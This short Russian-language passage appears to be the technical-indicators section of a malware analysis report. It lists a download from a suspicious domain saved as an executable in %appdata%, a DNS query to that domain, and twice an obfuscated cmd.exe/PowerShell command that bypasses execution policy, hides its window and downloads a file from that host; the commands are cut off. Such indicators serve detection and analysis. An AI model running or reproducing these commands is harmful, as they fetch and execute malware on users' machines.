Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWe^rshELl^.^ex^E^ ^-EXE^C^UtIONpOl^i^cY^ byPA^Ss -NOProF^iLe -Wi^N^D^OwstyLe hiD^D^E^N (n^E^W-Obj^e^ct^ sY^StE^M^.^nET.w^eBclIen^T).D^OW^n^LoAD^fi^LE^('http://flowers-...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "p^OWe^rshELl^.^ex^E^ ^-EXE^C^UtIONpOl^i^cY^ byPA^Ss -NOProF^iLe -Wi^N^D^OwstyLe hiD^D^E^N (n^E^W-Obj^e^ct^ sY^StE^M^.^nET.w^eBclIen^T).D^OW^n^LoAD^fi^LE^('http://flowers-...' (со скрытым окном)